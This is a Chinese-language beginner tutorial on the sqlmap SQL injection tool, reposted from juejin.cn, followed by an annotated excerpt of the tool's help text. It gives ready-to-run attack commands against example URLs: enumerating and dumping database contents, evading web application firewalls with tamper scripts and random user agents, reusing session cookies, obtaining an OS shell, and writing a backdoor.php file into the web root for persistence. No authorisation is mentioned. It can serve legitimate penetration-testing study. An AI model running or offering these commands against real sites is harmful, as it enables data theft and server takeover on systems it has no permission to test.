sqlmap入门操作Sqlmap基础使用 简单扫描URL SQLMap可以通过一个URL来检测SQL注入漏洞 在这个命令
Sqlmap基础使用
简单扫描URL
SQLMap可以通过一个URL来检测SQL注入漏洞
sqlmap -u "http://example.com/page?id=1"
在这个命令中:
-u
用于指定目标URLhttp://example.com/page?id=1
是目标测试的URL,URL中的参数(例如id = 1
)是潜在的注入点。
自动化测试
检测并利用SQL注入
让 SQLMap 自动检测和利用漏洞:
sqlmap -u "http://example.com/page?id=1" --dbs --batch
--dbs
命令让SQLMap尝试列出目标系统中的数据库。--batch
选项可以避免交互式提示,适用于自动化测试。
深度攻击与数据提取
1.1列出数据库中的表
在确定一个数据库后,使用以下命令列出其中的表:
sqlmap -u "http://example.com/page?id=1" -D database_name --tables
在这个命令中:
-D
参数指定数据库名称。--tables
参数用于导出该表中的所有数据。
1.2获取表中的列
选择目标表后,列出表中的列:
sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name --columns
1.3导出敏感数据 获取指定列中的数据:
sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name -C column_name --dump
-C
参数指定要导出的列,--dump
导出这些列中的所有数据。
使用 POST 请求
如果目标网站使用的是 POST 请求来传递参数,你可以用 SQLMap 进行测试。假设 POST 数据为 id=1&name=test
:
sqlmap -u "http://example.com/page" --data="id=1&name=test"
绕过 WAF (Web Application Firewall)
有些网站可能使用 WAF 来保护自己不被 SQL 注入攻击。SQLMap 提供了绕过 WAF 的选项:
sqlmap -u "http://example.com/page?id=1" --tamper=space2comment
- 这里
--tamper
选项使用了一个脚本(如space2comment
)来混淆 SQL 语句,使其更难被检测到。 space2comment
将 SQL 语句中的空格替换为注释符,从而绕过简单的模式匹配规则。
随机化 User-Agent 和 Referer
通过随机化 User-Agent 和 Referer,可以减小被 WAF 识别为攻击的可能性:
sqlmap -u "http://example.com/page?id=1" --random-agent --referer="http://google.com"
指定数据库类型
如果你知道目标数据库的类型(例如 MySQL、PostgreSQL),你可以用 --dbms
参数指定:
sqlmap -u "http://example.com/page?id=1" --dbms=mysql
绕过验证码、认证及复杂防护
1.1自动化提交验证码
对于要求输入验证码的页面,可以使用SQLMap的--force-ssl
和--captcha
选项,自动化处理某些验证码。
sqlmap -u "https://example.com/page?id=1" --force-ssl --captcha
1.2使用已登录的会话
某些页面只有在登录后才能访问。在这种情况下,你需要使用现有的 Cookie 或会话信息:
sqlmap -u "http://example.com/page?id=1" --cookie="PHPSESSID=abcd1234"
1.3利用时间盲注和联合注入
如果目标应用屏蔽了标准的 SQL 注入,SQLMap 也可以使用盲注技术(如基于时间的盲注)进行攻击
sqlmap -u "http://example.com/page?id=1" --technique=T
--technique
选项指定了使用的注入技术(T=Time-based blind, U=Union query-based)。
高级攻击与持久化控制
1.1获得数据库的系统访问
在获取了管理员权限后,可以尝试直接获得操作系统的访问权限(例如通过 xp_cmdshell
):
sqlmap -u "http://example.com/page?id=1" --os-shell
此命令将尝试在目标服务器上获取命令行访问权限。
1.2文件操作与持久化
SQLMap 还可以通过 SQL 注入在目标系统上上传文件,从而获得更持久的控制:
sqlmap -u "http://example.com/page?id=1" --file-write=/path/to/file --file-dest=/var/www/html/backdoor.php
Sqlmap --help
Target:
At least one of these options has to be provided to define the
target(s) ##必须提供至少一个选项来定义目标
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-g GOOGLEDORK Process Google dork results as target URLs
##将 Google dork 结果处理为目标 URL
Request:
##这些选项可用于指定如何连接到目标 URL
These options can be used to specify how to connect to the target URL
##通过 POST 发送的数据字符串(例如“id=1”)
--data=DATA Data string to be sent through POST (e.g. "id=1")
##加入cookie值
--cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
##使用随机选择的 HTTP User-Agent 标头值
--random-agent Use randomly selected HTTP User-Agent header value
##使用代理连接到目标 URL
--proxy=PROXY Use a proxy to connect to the target URL
##使用洋葱浏览器
--tor Use Tor anonymity network
--check-tor Check to see if Tor is used properly
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to provided value
Detection:
##这些选项可用于自定义检测阶段
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
Techniques:
##这些选项可用于调整特定SQL注入的测试技术
These options can be used to tweak testing of specific SQL injection
techniques
--technique=TECH.. SQL injection techniques to use (default "BEUSTQ")
Enumeration:
##这些选项可用于枚举后端数据库管理系统信息,结构和数据表
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables
-a, --all Retrieve everything ##检索一切
-b, --banner Retrieve DBMS banner ##检索DBMS横幅
--current-user Retrieve DBMS current user ##检索DBMS当前用户
--current-db Retrieve DBMS current database ##检索DBMS当前数据库
--passwords Enumerate DBMS users password hashes ##枚举DBMS用户密码哈希
--dbs Enumerate DBMS databases ##枚举DBMS里的数据库
--tables Enumerate DBMS database tables ##枚举DBMS里的数据库的表
--columns Enumerate DBMS database table columns ##枚举DBMS里的数据库的表的列
--schema Enumerate DBMS schema ##列举DBMS模式
--dump Dump DBMS database table entries ##转储DBMS数据库表条目
--dump-all Dump all DBMS databases tables entries ##转换所有DBMS数据库表条目
-D DB DBMS database to enumerate ##DBMS数据库枚举
-T TBL DBMS database table(s) to enumerate ##要枚举的 DBMS 数据库表
-C COL DBMS database table column(s) to enumerate ##要枚举的 DBMS 数据库表列
Operating system access:
##这些选项可用于访问后端数据库管理系统底层操作系统
These options can be used to access the back-end database management
system underlying operating system
--os-shell Prompt for an interactive operating system shell
##提示交互式操作系统 shell
--os-pwn Prompt for an OOB shell, Meterpreter or VNC
##提示 OOB shell、Meterpreter 或 VNC
General:
These options can be used to set some general working parameters
--batch Never ask for user input, use the default behavior
##永远不要求用户输入,使用默认行为
--flush-session Flush session files for current target
##刷新当前目标的会话文件
Miscellaneous:
These options do not fit into any other category
--wizard Simple wizard interface for beginner users
##为初学者提供简单的向导界面
转载自:https://juejin.cn/post/7418504824856166436